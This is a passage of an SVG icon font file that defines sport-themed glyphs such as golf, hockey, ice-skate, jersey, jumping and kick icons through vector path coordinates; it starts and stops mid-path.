29-29 2-2 6-4 4-8z m6 15c-11 11-21 21-31 31-5 5-5 9 0 13 10 10 20 19 29 29 5 5 9 6 14 0 9-10 19-19 29-28 2-2 4-5 5-7 0-1 0-2-1-3-13-13-25-26-38-38-3-2-5 1-7 3z m96-15c-1-4-4-4-8-4-11 0-22 0-32 0-11 0-22 0-32 0-4 0-7 1-8 3-2 4 2 6 3 7 11 11 21 21 31 32 4 4 8 5 12 0 10-10 21-20 31-31 2-2 5-4 3-7z m45 7c-1-10-10-15-20-10-4 3-4 5 0 9 1 1 2 2 4 4 4 4 8 9 12 14l4-2c0-5 0-10 0-15z m-19 18c-16-17-12-18-29 0-9 9-26 17-24 29 1 10 16 18 25 27 13 14 14 14 27 0 8-8 20-14 20-30 1-13-11-18-19-26z m9 111c-6-6-11-13-7-22 6 1 8 8 15 11 3-14 1-28 1-43-8 3-11 9-16 14-11 10-22 10-32 0-9-8-18-16-26-25-7-8-12-10-19-1-7 9-16 17-25 25-11 12-22 12-34 0-9-9-18-17-26-27-6-6-10-6-16 0-8 10-18 19-27 28-10 9-22 10-31 1-9-9-18-18-27-27-7-8-13-8-19 1-3 3-7 7-11 10-4 4-8 0-11-2-4-4 1-6 3-8 18-21 18-21-1-40-22-22-22-22-45 1l-1 1c-17 17-17 17-3 37-7 2-13 3-18-3-5-7-9-6-13 0-11 13-27 19-41 26-7 9-13 10-21 1-11-11-21-31-34-30-11 1-22 19-33 30-13 13-24 13-38-1-8-8-16-16-24-25-5-5-9-6-14 0-10 11-20 21-30 30-5 5-5 8 0 12 8 8 16 16 24 24 5 4 4 8 0 12-5 4-7-1-9-4-6-6-13-13-21-23v67c9-2 11-12 19-16 0 17 0 17-11 27-6 6-9 11 0 17 12 8 16 22 18 38l-22-29-5 3v61l5 4c8-9 16-19 24-28 2-3 4-7 9-3 4 4 3 8-1 11-10 10-19 20-29 29-4 5-7 8-1 13 11 10 21 21 31 31 5 6 8 4 13-1 8-9 16-18 26-26 8-7 9-12-1-19-4-3-8-5-10-11 16 4 30 13 48 9-12 10-7 17 2 24 5 4 9 9 13 14 18 18 18 18 36 0 1-2 2-3 4-4 19-20 19-20 1-40-3-2-8-4-2-9 4-3 6-4 10 1 21 20 42 40 62 61 7 7 10 7 17 1 9-9 15-22 35-16-10 10-19 18-28 26-6 4-6 8 0 13 10 10 20 20 29 30 5 4 8 5 12 0 10-11 21-21 31-31 6-5 5-8 0-12-11-9-21-19-32-29 10-8 16-7 22 0 9 8 16 24 27 22 9-1 17-15 25-23 1 0 2-1 2-2 14-14 14-14 0-28-2-3-4-5-7-7-3-4-2-6 1-9 2-3 5-2 7 0 1 0 1 1 1 1 10 13 22 22 41 13-9 18-10 18 4 31 9 9 17 25 27 24 9 0 18-15 27-23 0-1 1-1 2-2 10-8 17-16 1-28 15 2 28 2 45-1-18 13-12 21-1 29 7 6 13 12 18 19 8 10 14 8 21 0 3-4 6-7 10-11 22-22 22-22-1-45-12-12-12-12-7-28 10 12 21 23 31 35 5 6 9 7 15 1 6-8 15-14 21-22 7-8 7-18 1-27 0-1-1-2-2-2-10-8-17-25-27-24-9 0-18 15-27 23-5 4-8 10-15 13-4-8-1-14 4-19 6-6 12-12 18-19 2-1 5-3 5-5 2-21 19-11 30-14-2-10 1-17 8-24 14-13 14-24 0-37z m9 49c-8 1-10 10-17 12-5 6-7 11 1 17 5 4 8 10 13 14 5-15 3-29 3-43z m-364 103c-50 1-91-39-92-88-1-49 39-91 89-92 49 0 91 40 91 89 1 49-40 91-88 91z m2-13c1 5 5 3 8 3 17-3 31-10 45-23-20-1-35 3-49 14-2 1-5 2-4 6z m11-48c6-11 14-22 17-34 3-11-17-24-34-24-15 0-32 15-32 27 0 11 20 34 31 34 6-1 14 3 18-3z m-25 51c2 1 6 1 7-3 1-4-2-5-5-6-14-7-27-14-46-12 13 13 28 18 44 21z m-31-26c12 2 23-10 19-22-4-10-12-20-18-30-2-4-8-2-14-3-5-2-7 3-10 8-12 24-4 42 23 47z m-35-81c-5 15-4 30-2 48 11-16 15-30 14-46-1-3-1-7-5-8-5-1-5 3-7 6z m10-18c-1 2-4 4-1 6 3 2 5 3 8 1 15-8 28-17 34-37-19 5-31 16-41 30z m35-5c0 8 6 14 14 16 5 0 10 0 17 0 5-1 13 2 19-3 5-4 13-9 11-15-4-10-11-19-22-23-16-6-39 8-39 25z m95 1c-11-14-25-23-46-29 11 18 24 28 39 37 3 2 6 3 9 0 3-3 0-5-2-8z m11 19c-2-2-2-6-6-6-4 1-4 4-5 8-1 16 4 31 14 49 3-20 3-36-3-51z m-13 29c-2-5-7-2-10-2-9-1-15 2-18 9-4 8-10 15-13 23-5 13 5 23 18 23 18 1 25-10 31-23 5-12-5-20-8-30z m-197 6c-5 0-10-1-15 0-10 1-11-5-11-13 1-12 11-5 16-7 4-1 10 3 11-4 1-6 1-11-6-15-22-13-47-4-52 22-3 10-2 21 1 31 3 12 11 18 23 20 11 3 23 1 30-10 7-12 17-7 23-2 7 4-1 12-4 17-21 27-78 20-92-13-11-23-10-48 5-70 15-21 37-22 59-20 29 4 37 13 37 39 0 25 0 25-25 25z m307 40c-3 8-5 16-16 13-5-2-13 3-16-6-13-34-27-67-40-101-1-4-2-8 3-8 9 0 21-4 23 10 2 13 10 16 22 16 17-1 33 3 38-21 2-9 16-6 22-4 7 2 0 9-1 13-11 30-23 59-35 88z m-5-55c-7-4-16-3-24-1-5 1-2 5-1 8 3 10 7 20 12 33 4-11 8-18 10-26 2-5 7-12 3-14z m136-28c-13 0-25 0-37 0-10-1-14 2-13 13 0 24-1 48 0 73 0 8-3 10-11 10-8 0-13 0-13-10 1-16 0-32 0-47 0-16 0-32 0-48 0-7 2-10 9-10 22 0 43 0 65 0 8 0 8 5 8 10 0 6-2 9-8 9z" />
<glyph glyph-name="golf-alt" horiz-adv-x="1000" unicode="&#xeda4;" d="M501 850c-200 0-360-159-360-357 0-201 158-361 356-361 203 0 362 158 362 359 0 200-159 359-358 359z m219-126c25-6 37-25 45-45 0-14-6-18-17-17-27 3-38 24-44 46-2 9 4 19 16 16z m-43-84c2-16-8-37-30-32-33 2-43 24-45 47-1 14 7 33 31 30 28-3 42-23 44-45z m-71 165c24-2 35-18 43-36-3-13-8-21-21-19-23 3-39 15-44 37-2 12 7 20 22 18z m-102-46c23-1 36-14 37-32 1-20-11-37-38-33-25-6-38 13-38 32 0 18 14 34 39 33z m-145 10c3 23 18 35 41 38 17 2 24-8 22-20-4-23-21-35-38-35-20-3-26 6-25 17z m-29-128c3 22 15 44 44 45 26 1 34-18 31-35-3-22-15-44-44-42-26-3-33 17-31 32z m-49 83c12 3 18-6 16-15-6-23-17-42-43-47-12-1-20 5-17 15 6 23 20 41 44 47z m-110-272c-10 23-7 42-4 61 29-18 30-27 4-61z m41 101c2 20 9 41 47 41 11-1 16-19 14-33-4-17-8-39-35-39-22 0-27 16-26 31z m1-133c-1 13 5 27 26 26 28-1 28-25 37-39-7-15-4-34-25-32-27 2-37 23-38 45z m70-163c-26 5-40 24-46 47-3 10 6 17 17 15 27-3 34-25 44-42-1-12-2-22-15-20z m38 225c-1 21 8 43 37 45 33 1 42-24 42-45 0-17-8-43-38-40-29-4-40 18-41 40z m10-153c-2 13 7 34 29 29 33 3 42-21 47-43 2-12-5-31-27-31-29 0-45 20-49 45z m70-154c-22 3-39 14-42 37-1 12 5 20 28 17 14 0 31-11 35-34 2-11-5-23-21-20z m103 49c-25-5-38 13-39 31-1 16 9 33 34 34 26 1 42-11 42-34 0-17-13-34-37-31z m4 128c-37 0-48 24-47 45 0 23 13 42 45 41 32-1 42-23 41-44-2-22-14-46-39-42z m-5 177c-33 0-44 23-43 43 0 20 11 47 44 43 32 3 43-23 43-44 0-22-12-43-44-42z m102-352c-16-4-23 8-21 19 4 22 22 33 44 36 14 2 19-7 20-18 1-15-24-37-43-37z m70 151c-5-22-16-45-41-42-28-2-36 17-33 30 4 22 13 43 44 43 25 0 33-17 30-31z m-28 114c-31-3-39 22-39 41 0 18 7 42 35 44 31 2 43-20 43-43 1-21-9-43-39-42z m118-139c-9-22-22-41-47-46-12 1-17 11-14 19 9 21 18 43 46 44 13 0 18-8 15-17z m-12 72c-22-3-26 17-25 30 2 19 8 40 36 41 20 1 20-14 26-26-6-21-12-41-37-45z m9 147c-27 2-31 25-33 44-2 10 3 28 24 28 28-2 31-22 37-41-4-16-5-33-28-31z m69-2c7-25 7-44-1-71-24 27-25 46 1 71z m-214-419c-39-2-78-1-117-1-37 0-75 1-113 0-8 0-20 5-24-5-5-10 2-20 7-28 6-8 15-18 24-20 60-12 65-54 60-103-1-10 0-21 0-31 0-64 0-63 64-63 24 0 31 8 29 31-1 34 2 68 0 101-2 30 11 47 38 56 20 6 38 15 48 35 8 17 11 29-16 28z" />
<glyph glyph-name="golf-bag" horiz-adv-x="1000" unicode="&#xeda5;" d="M404 850h22c16-9 34-10 51-14 43-10 54-21 55-65 4-94 8-187 10-281 1-22 7-23 25-18 11 4 12 12 15 20 19 50 37 100 56 150 12 30 29 43 54 40 20-2 40-5 60-6 20 0 32-8 42-23v-27c-21-34-30-37-70-27-12 4-24 5-35 10-13 6-19 2-24-12-10-29-21-59-33-88-6-16-11-28 12-33 9-2 15-10 19-19 3-9 10-10 19-11 25-3 35-15 36-40 0-24 0-49 0-74-1-24-9-35-34-39-11-2-15-6-14-17 0-28 1-55-1-83-1-18 6-25 23-22 5 0 11 0 16 0 30-2 42-13 42-43 0-59 0-118 0-177 0-30-13-42-43-42-6 0-13-1-20 0-11 1-17-2-19-15-4-28-22-43-51-44-71 0-143 0-215 0-31 1-50 19-52 50-1 14-2 28-1 42 3 24-4 42-22 57-11 10-19 22-26 34-45 81-54 167-35 256 7 35 23 68 54 89 17 11 34 20 44 39 5 9 17 15 28 15 17 1 18 7 13 21-20 51-39 102-58 153-18 49-18 49-69 35-41-11-49-8-71 25v27c8 17 22 24 41 25 15 1 30 2 44 4 42 5 57-3 72-43 25-68 51-137 76-205 11-29 11-29 42-22 3 1 6 2 8 3 11 0 14 6 13 16-3 92-7 183-10 275 0 12-6 15-16 15-19 1-38 2-56 4-26 2-42 22-39 48 1 16 12 26 22 37z m-57-788v269c-53-29-48-209 0-269z" />
<glyph glyph-name="golf-cart" horiz-adv-x="1000" unicode="&#xeda6;" d="M773 258c37-1 74 0 111 0 9 1 18 5 27 7-3 10-3 21-9 29-29 46-70 79-120 102-9 4-20 15-21 24-8 58-14 117-20 176-1 5 1 10 1 18 16 0 30 1 44 0 22-2 25 9 21 27-7 34-31 49-60 61h-544c-51-22-67-44-60-88 26 0 53 1 80-1 7 0 19-11 19-17 1-81 1-163 0-245 0-2-1-3-3-6-3-1-7-3-10-2-83 9-123-41-152-107-5-10-10-21-15-31v-35c11-8 21-15 32-23 51 91 105 124 175 110 71-15 112-66 123-158 49 0 98-1 148 0 38 1 82-10 111 7 27 16 38 61 56 93 5 9 11 19 15 28 10 22 27 32 51 31z m-81 95c-34 33-62 59-91 86 9 10 19 17 22 26 3 9 4 25-1 30-6 6-25 8-30 3-29-28-57-57-82-87-5-6-4-24 1-28 7-5 22-7 30-4 10 4 16 17 25 27 32-30 62-57 91-86 4-3 5-14 3-19-17-37-34-73-53-108-3-6-12-12-19-12-40-2-80-1-124-1 0 37 0 71 0 106-1 44-13 56-56 56-34 1-68 0-105 0v270c8 0 16 2 25 2 109 0 218 0 327 0 18 0 27-5 28-24 6-60 13-120 18-180 2-16-5-33-9-57z m131-128c-63-1-112-51-111-115 0-63 50-113 114-112 63 0 112 51 112 114-1 63-52 114-115 113z m0-150c-20 0-37 18-35 38 2 21 14 34 36 34 21 1 37-15 37-36 0-20-18-37-38-36z m-580 150c-62 1-114-51-115-113 0-62 50-114 113-114 63-1 113 49 114 113 0 63-50 113-112 114z m0-150c-20-1-39 16-38 36 1 20 11 35 34 36 24 2 37-12 40-34 3-19-16-37-36-38z" />
<glyph glyph-name="golf-field" horiz-adv-x="1000" unicode="&#xeda7;" d="M973 300c-29 39-67 66-109 88-85 45-177 65-272 78-26 4-53 6-79 2-48-6-87-30-116-68-26-32-49-67-73-100-43-58-99-96-172-109-14-2-18 0-18 15 1 118 1 237 0 356 0 13 5 18 17 21 74 24 148 49 223 73 4 2 9 1 13 8-53 17-106 34-158 52-30 10-61 17-90 31h-27c0-8-1-16-1-24 0-171 0-343 0-514 0-15-1-22-19-25-32-6-57-23-72-49 0 0-50-64 8-127 23-27 53-39 87-42 41-6 165-20 344-6h11c34 4 68 8 102 12 28 4 55 8 82 13l1 0c71 13 139 33 205 65 42 21 81 47 111 86 38 48 38 115 2 164z m-810-287c-13-6-27-7-39-9-28 2-52 9-70 29-18 19-23 47-12 70 13 25 35 38 61 43 9 2 7-5 7-10 1-15 1-30 1-45 0-8-1-15 11-15 13 0 13 7 13 16-1 12 0 25-1 37-1 14 2 19 18 15 31-10 54-35 57-67 2-24-18-51-46-64z" />
<glyph glyph-name="golf" horiz-adv-x="1000" unicode="&#xeda8;" d="M96 243l33-39c0 0 12-108 12-108h5l12 108c0 0 33 39 33 39s-53-8-95 0z m48 292c-80 0-144-64-144-143 0-80 64-144 144-144 79 0 143 64 143 144 0 79-64 143-143 143z m106-149c9 0 16 7 17 16 0-1 1-2 1-3 0-10-8-17-18-17-9 0-17 7-17 16 2-7 9-12 17-12z m-5-17c0-1 0-2 0-3 0-9-8-17-17-17-9 0-17 7-17 17 2-8 9-13 16-13 9 0 17 7 18 16z m-42 17c9 0 16 7 18 16 0-1 0-2 0-3 0-10-8-17-18-17-9 0-17 7-17 16 2-7 9-12 17-12z m-10-57c9 0 16 7 17 15 1 0 1-1 1-2 0-10-8-18-18-18-9 0-17 8-17 17 2-7 9-12 17-12z m-17-51c-9 0-17 8-17 17 2-7 9-12 16-12 9 0 17 6 18 15 0-1 0-2 0-2 0-10-8-18-17-18z m39 20c-9 0-16 7-17 17 3-7 9-12 17-12 9 0 16 6 18 15 0-1 0-2 0-3 0-9-8-17-18-17z m35 31c-9 0-17 7-17 17 2-7 9-13 17-13 9 0 16 7 17 16 0-1 1-2 1-3 0-9-8-17-18-17z m466-71h-458c0-117 108-213 242-213 118 0 215 74 237 173l51 71h-50l-22-31z m-215-170c-136 6-183 105-185 109l17 8c2-4 45-93 169-99l-1-18z m445 567l-197-350h50l201 350z" />
<glyph glyph-name="golfer" horiz-adv-x="1000" unicode="&#xeda9;" d="M379 652c54-10 106 26 116 80 10 55-26 107-81 117-54 9-106-27-116-81-9-54 27-106 81-116z m389-751c-17 49-18 79-127 54l-150 331c5 0 10 1 15 3 19 8 28 31 19 50l-98 225c-4 9-11 15-19 19-11 9-24 15-38 18-46 8-89-22-97-68l-41-224c-5-28 5-55 23-74v-344c0-23 19-41 42-41 23 0 41 18 41 41v23c23 0 42 19 42 42v287c8 10 14 22 17 36l21 117 38-88c5-12 16-20 28-22 66-159 157-385 157-385s140-36 127 0z" />
<glyph glyph-name="helmet" horiz-adv-x="1000" unicode="&#xedaa;" d="M994 466c-30 110-93 193-182 242-48 27-104 43-162 47-30 3-60 2-90-2-304-17-412-218-413-223-1-2-5-22-7-44-1-9-1-18 0-28-10-5-17-16-16-27 1-16 15-28 31-27 39 3 70-1 94-12l-3-13c-8-41-17-89-29-137-6 1-13 1-20 1-30 1-39 35-111 36-28-2-50-4-64-20-9-10-11-22-11-32 0-2 0-4 0-6-1-14-9-152-11-240 0-13 8-25 20-28 51-16 98-12 139 12 66 40 74 94 102 187 14 0 30 1 50 2 1-17 5-34 15-66 21-46 53-75 94-87 83-24 154-73 225-28 23 17 67 41 123 24 2-1 3-2 4-2 21-12 68-19 83-21 19-2 31 1 39 19 3 7 5 15 9 36 2 5 2 10 3 14l0 3c2 7 4 17 6 29 16 69 113 276 82 391z m-865-451c-21-13-44-17-71-12 1 23 2 46 3 68 3 6 6 12 12 18 16 15 20-2 98-13-20-42-11-43-42-61z m55 92c-68 10-87 37-120 15 3 38 5 96 5 96 4 2 9 3 18 3 70 0 78-66 108-68 2 0 4 0 6 0-5-16-11-31-17-46z m122 137c-11-1-21-1-30-2 8 34 15 68 22 100 12-32 9-70 8-98z m226-50c-34 0-61 28-61 61 0 34 27 61 61 61 34 0 61-27 61-61 0-33-27-61-61-61z" />
<glyph glyph-name="hockey-alt" horiz-adv-x="1000" unicode="&#xedab;" d="M749 197c-2 18-3 19-21 21-36 4-69 14-92 45-7 9-15 19-21 29-26 46-52 90-78 136-25 43-51 86-74 131-21 39-45 76-68 114-2 3-4 6-8 6-12 0-24 0-39 0 20-36 40-69 58-103 17-30 35-60 53-90 36-60 71-122 106-183 14-24 29-48 41-73 21-46 53-79 103-93 14-4 29-7 43-10 7-2 7 1 6 6-3 22-6 43-9 64z m-275 173c17 29 16 28-1 57-5 8-7 6-10-1-6-9-11-19-17-28-24-41-47-82-71-122-21-32-50-52-89-56-9-1-17-3-26-4-4-1-7-2-7-7-4-26-8-52-12-78-2-8 3-6 8-5 21 5 43 9 64 18 29 13 52 31 67 60 6 12 12 24 19 36 25 43 50 87 75 130z m-313-160c-27-2-55 0-83 2-10 0-21-1-32-2-24-4-34-13-40-36-2-7-4-15-5-23-4-28 4-40 32-44 38-4 77-1 115 3 5 1 7 4 7 9 1 9 2 18 3 27 3 18 7 36 10 54 2 6 1 10-7 10z m834-39c-5 26-16 35-42 39-29 4-57-1-86-1-8 0-16 0-24 0-12 2-13-3-11-13 5-25 10-50 14-75 1-6 5-9 11-10 23-5 47-3 70-6 18-2 36 0 54 5 13 5 18 13 19 27 1 11-2 23-5 34z m-402-78c-16-1-33 1-49 0-27-1-53 1-79 0-9 0-17-2-25-1-13 2-25 1-37 0-9-2-14-6-14-15 0-13 0-27 0-40 1-12 5-16 17-16 31-1 62 2 88 0 37 0 69 0 100 0 14 0 19 5 19 18 0 12 0 24 0 36 0 13-6 19-20 18z m-175-18c-1-6 0-12 0-18 0-5-1-9 0-14 0-6 0-12-9-11-9 0-12 3-12 11 1 11 0 22 0 32 0 6 3 10 9 9 5-1 13 0 12-9z m115 396c40 70 79 138 119 208-14 0-26 0-38 0-5 0-7-2-9-6-30-52-60-105-91-157-2-4-3-7-1-12 6-10 12-20 20-33z m-307-258c-9 0-19-1-28-2-5-1-6-4-6-7-5-28-9-55-14-83-1-5 1-7 7-7 27 2 29 4 33 31 1 1 1 3 1 4 5 19 8 39 11 60 0 2 1 5-4 4z m585-22c-3 20-4 20-24 21-17 1-17 1-15-17 3-21 11-41 11-63-1-9 3-15 14-15 5 1 12-1 17-2 8-2 10 1 8 8-7 22-8 45-11 68z" />
<glyph glyph-name="hockey" horiz-adv-x="1000" unicode="&#xedac;" d="M212 385c-37-38-74-75-109-112-9-9-15-12-22-1-2 3-5 6-8 8-4 7-9 9-16 3-5-3-10-4-15-6-12-2-23-3-31 7-8 10-9 23-2 32 12 16 10 27-6 38-5 4-3 7 1 11 17 17 35 35 52 52 5 6 8 3 12-1 14-13 29-26 43-40 7-7 10-3 15 2 5 5 7 8 0 14-14 12-28 26-42 39-4 3-8 6-3 12 5 5 8 2 12-2 13-12 26-23 39-35 6-6 9-10 18-1 8 9 2 12-4 17-12 12-25 23-37 35-4 3-8 5-2 11 4 4 7 4 12-1 12-12 25-23 37-35 6-6 10-7 17 0 6 7 4 11-2 16-12 11-24 23-36 34-6 5-6 8-1 12 46 43 89 89 139 126 10 7 20 13 31 20 7 4 9 3 12-6 7-29 23-52 50-67 50-27 107-9 134 42 2 5 5 10 6 15 7 16 7 16 21 7 37-22 67-54 99-83 18-16 35-34 53-51 8-7 8-11 0-18-12-10-23-22-35-32-7-6-5-9 0-15 5-5 8-8 15-2 12 13 25 24 38 36 4 4 8 8 13 1 6-6 0-8-3-11-14-13-27-26-41-38-7-6-2-9 2-13 3-4 6-10 13-3 13 13 28 26 41 39 4 4 8 8 13 1 6-6 0-8-3-11-14-13-27-27-41-39-7-6-6-9 0-15 4-4 7-8 14-1 14 14 30 26 44 40 7 8 11 2 15-3 4-4 14-7 5-16-28-28-54-56-81-84-5-6-8-5-13 0-24 23-49 45-72 67-5-12-9-25 7-39 16-15 29-33 44-49 5-5 6-9 1-14-39-40-77-79-114-119-7-8-10-3-14 2-37 38-73 75-109 114-8 8-12 8-19 0-83-88-166-175-249-262-8-8-12-8-19 0-7 10-17 18-25 28-6 6-10 8-17 0-9-10-21-16-35-18-25-4-39 13-30 37 4 11 10 21 20 27 10 7 8 11 0 17-6 6-12 14-18 20-7 5-5 9 0 15 60 67 119 134 180 200 13 15 14 28 6 46z m48-60c-6-6-11-13-17-18-6-5-4-9 1-13 20-18 39-37 59-55 19-17 19-17 35 2 5 5 6 8 0 13-24 21-47 44-71 65-2 2-4 4-7 6z m235-102c4 3 7 5 9 7 20 18 39 36 58 54 18 17 18 16 1 34-6 7-9 5-15 0-22-21-44-41-66-61-3-3-11-6-7-11 5-9 13-15 20-23z m-192 380c-2-1-3-1-4-1-10-6-20-12-30-18-17-10-17-10-7-27 4-8 7-9 13-5 12 8 25 15 37 23 3 2 8 3 4 9-4 6-7 14-13 19z m211 0c-6-3-7-10-11-15-6-7-4-11 3-14 10-6 21-12 30-19 10-7 15-5 21 5 6 10 7 16-5 21-11 5-20 12-30 18-2 2-5 3-8 4z m-134 190c0-23 0-46 0-69 0-6-1-12 8-12 10 0 8 6 8 12 0 22 1 45 0 67 0 8 3 10 10 11 23 1 23 1 23-22 0-19 0-38 0-57 0-6-1-10 8-11 9 0 8 5 8 11 0 20 0 39 0 58 0 15 2 16 15 8 43-24 61-76 43-122-4-8-6-16-7-24-7-41-44-74-84-73-41 0-77 33-83 74-1 8-3 16-7 24-19 46 3 103 48 124 3 1 6 3 10 1z m450-415c-35-37-68-71-100-105-115-120-230-239-344-359-16-17-33-17-52-15-4 1-6 3-7 6-8 16-15 32-23 48-4 8 0 9 6 8 16-1 32-1 47-3 9-1 15 3 21 9 130 136 261 272 391 409 8 8 15 13 28 9 10-4 20-5 33-7z m-61-356c-16 0-30 6-40 18-8 9-13 7-19-1-9-10-19-19-28-29-4-5-7-5-12 0-26 28-52 55-78 82-6 5-7 9-1 15 37 38 74 76 110 115 7 6 10 6 16-1 25-28 50-56 75-84 5-5 4-9 0-13-7-7-13-14-20-20-7-6-8-10 0-16 13-10 22-22 23-39 1-17-9-27-26-27z m72 428c42 44 82 86 122 127 9 10 21 10 30 2 9-9 10-21 0-31-32-34-65-68-97-102-3-3-6-6-11-5-14 3-27 6-44 9z m-626-545c-11 0-23-1-34 2-13 4-19 14-18 29 1 20 6 28 21 31 10 2 20-1 30-1 4 0 5-3 7-6 7-16 15-33 23-49 3-7 1-9-6-8-8 1-15 1-23 2z m546 379c15 13 29 25 43 38 9-13 10-28 1-38-9-10-26-11-44 0z m-493-322c11 4 16 0 20-9 6-14 13-28 19-42 2-4 6-8 1-11-4-2-10-1-13 5-9 19-17 38-27 57z m11-59c-10-3-15 0-19 8-6 15-13 29-20 44-1 3-5 7-1 9 4 3 10 3 13-3 9-19 18-38 27-58z m540 522c5 10 11 13 19 10 9-2 18-3 27-5 3-1 10 1 9-5-1-5-6-10-12-8-14 3-28 5-43 8z m34-24c-20-18-38 1-58-2 9 15 28 15 58 2z" />
<glyph glyph-name="ice-skate" horiz-adv-x="1000" unicode="&#xedad;" d="M964 261h-637v36h647s79 77-38 99c0 0-132 12-274 59l-95-67-21 29 74 53c-9 4-19 8-28 12l-110-79-21 30 93 66c-10 4-20 9-29 14l-112-79-21 29 99 70c-112-9-131 144-158 173l-278 0c-5 1-11 1-18-1-16-4-36-19-37-69v-642h766c8 0 92 1 151 59 34 34 52 80 53 137 17 3 30 17 30 35 0 20-16 36-36 36z m-668-233h-233v122h233v-122z m63 0v160h245v-160h-245z m534 50c-49-50-125-50-127-50h-99v160h269c-2-46-16-83-43-110z" />
<glyph glyph-name="jersey-alt" horiz-adv-x="1000" unicode="&#xedae;" d="M988 522c-70 58-140 118-210 177-7 6-15 15-24 17-37 6-74 10-112 14 0-22 12-28 30-30 28-5 59 2 82-17 66-54 130-110 195-165 5-4 15-8 7-17-8-8-13 2-18 7-48 40-97 79-144 121-36 32-73 58-124 55-7-1-19 9-21-5-1-14 12-10 21-12 22-5 48 1 68-15 63-52 126-105 190-157 10-9 12-15 2-26-26-30-52-60-76-91-12-15-20-13-33-2-25 23-51 44-80 69 0-11-1-16-1-22 0-116 0-232 0-348-1-51-1-51-52-62-90-20-182-19-273-14-43 2-86 7-128 20-19 6-27 15-27 37 1 118 1 236 0 354 0 10 3 20-3 32-27-22-53-44-79-66-12-10-19-14-31 2-23 30-48 59-74 87-13 14-9 21 4 32 59 49 117 98 176 148 12 10 25 18 42 18 15 0 31 4 46 6 6 0 8 3 9 8 0 6-3 9-9 8-34-6-71-1-101-28-57-51-116-99-175-148-6-5-11-17-20-8-11 12 5 16 10 20 50 44 103 84 151 130 36 33 75 49 122 49 19 0 29 8 30 31-31-5-60-8-89-13-11-2-23 1-34-8-75-64-150-128-226-191-13-10-10-18-1-29 46-55 92-110 138-165 7-9 12-11 22-2 18 17 38 32 62 52 0-17 0-26 0-35 0-93 0-187 0-280 0-58 7-65 62-80 54-14 109-17 164-19 89-3 177 0 264 23 44 11 50 21 50 66 0 97 0 194 0 290 0 10 1 20 2 34 20-17 38-30 53-45 14-13 21-14 34 2 43 53 87 106 132 157 13 15 12 22-3 34z m-605 146c11 10 17 7 26-4 52-68 130-68 183 0 9 11 13 15 25 4 13-13 15-4 16 9 2 28-4 50-33 62-24-75-54-104-103-102-48 1-80 34-96 103-31-21-36-31-35-62 0-14 2-24 17-10z m205-138c1-18 20-45 33-45 12 0 32 26 32 44 3 16-2 28-23 23-15-4-44 17-42-22z" />
<glyph glyph-name="jersey" horiz-adv-x="1000" unicode="&#xedaf;" d="M953 486c-52 43-106 84-155 131-40 38-84 62-139 62-9 0-17 0-25 3-18 5-28-1-38-17-44-63-135-72-181-11-24 31-47 30-77 25-20-4-40-6-61-9-8-1-15-3-22-9-70-59-140-118-211-177-10-8-10-14-1-24 28-33 56-66 84-100 9-11 15-12 26-2 25 23 53 45 84 71 0-16 0-25 0-34 0-118 1-237 1-356 0-41 1-44 42-54 101-25 203-25 306-19 46 2 91 7 135 19 38 10 41 14 41 53 0 75 0 150 0 225 0 53 0 107 0 167 31-26 58-47 83-70 12-11 19-12 30 2 26 34 54 66 82 98 11 12 6 18-4 26z m-281 41c-2-18-20-47-34-47-12 0-31 29-34 45-4 31 16 27 35 26 16-1 37 7 33-24z m-647-11c70 58 139 116 209 175 8 7 17 12 29 13 33 3 67 7 100 12 7 1 17-1 19 10-2 11-8 8-15 8-39-5-79-10-118-14-9-1-16-6-22-11-71-60-142-120-213-180-5-4-21-9-11-20 10-12 16 2 22 7z m960 13c-70 60-141 120-212 179-5 5-12 10-18 11-43 5-85 10-127 15-5 1-9 1-10-5-1-8 4-10 10-11 26-3 53-6 79-10 21-3 42-2 60-17 68-59 137-116 206-174 6-5 13-20 24-8 10 11-6 15-12 20z m-16-22c-68 58-136 115-204 172-5 5-11 11-18 12-39 7-79 12-116 17-8 0-17 2-17-8 0-8 9-7 15-7 27-4 54-9 80-10 23-1 40-11 57-26 64-55 128-109 193-163 5-4 10-17 20-7 11 12-4 16-10 20z m-928-13c63 52 126 105 189 159 19 17 38 30 66 30 24 1 49 6 74 9 6 1 13 0 16 8-1 8-6 9-12 8-17-2-34-2-50-6-28-8-60 1-85-19-70-58-140-118-210-177-5-5-18-8-8-19 10-11 15 2 20 7z m459 131c52 0 98 39 105 90 1 8 7 19-8 22-16 2-12-9-14-18-10-42-43-70-82-71-40 0-73 28-83 71-2 9 0 21-15 18-14-3-9-15-8-23 6-49 54-89 105-89z" />
<glyph glyph-name="jumping" horiz-adv-x="1000" unicode="&#xedb0;" d="M1000 579c0-69-56-125-125-125s-125 56-125 125c0 69 56 125 125 125s125-56 125-125z m-154-167c-5 2-12 4-20 6-73 28-157 76-197 99l37 264c4 23-12 44-35 48-23 3-44-13-47-36l-42-291c-2-17 5-33 19-42 2 0 7-4 16-9l144-113c-21-92-67-159-109-201l-221-15-195 195c-16 16-43 16-59 0-16-16-16-43 0-59l209-208c7-8 18-13 29-13l113-12-151-67-275 157c-20 12-45 5-56-15-12-20-5-46 15-57l292-167c6-4 13-5 20-5 3 0 6 0 8 1 1-1 209 40 301 82 8 4 233 117 275 358 4 46-9 80-71 100z" />
<glyph glyph-name="kick" horiz-adv-x="1000" unicode="&#xedb1;" d="M67 367c-6 6-12 9-14 7l-32-33c-2-2 0-8 6-13l24-24-7-35 35 6 17-17-6-35 35 6 190-189-6-35 35 6 23-23-7-35 35 6 15-15-6-35 35 7 12-12c5-6 11-9 14-7l32 33c2 2-1 8-6 14l-424 423z m319-116l24-24-130-37 29-29 85 21 25-25-84-22 29-28 41 11 22-22-41-12 133-133s78 7 38 74c0 0-151 187-128 363 0 0 3 46-27 7l166 455h-180l-117-309c-2 4-5 6-8 9-10 5-28 5-56-23l-132-132 179-179 132 35z m385-211c115 0 209 93 209 208 0 115-94 209-209 209-115 0-208-94-208-209 0-115 93-208 208-208z m-164 188c0 0 9 11 9 11 2-27 10-52 24-73l-12 3c-11 18-18 38-21 59z m98-154c-5-2-8-4-11-5-26 11-49 27-68 47 1 3 1 7 2 12 2 12 4 26 5 32l0 2c2-1 6-2 13-4 16-4 44-12 50-13 1-1 3-3 5-7 6-9 15-24 23-35 3-5 5-9 7-12 1-1 1-2 1-2-3-2-16-9-27-15z m66 241c0 0 2-1 5-3 14-10 54-39 57-41-3-10-23-70-24-74h-76c-1 4-21 64-24 73 3 3 43 32 57 42 3 1 4 3 5 3z m-5 4v57l5-2 5 2v-57l-5 4-5-4z m75-169c0 0-6-8-6-8l-35 49h12l29-41z m-112 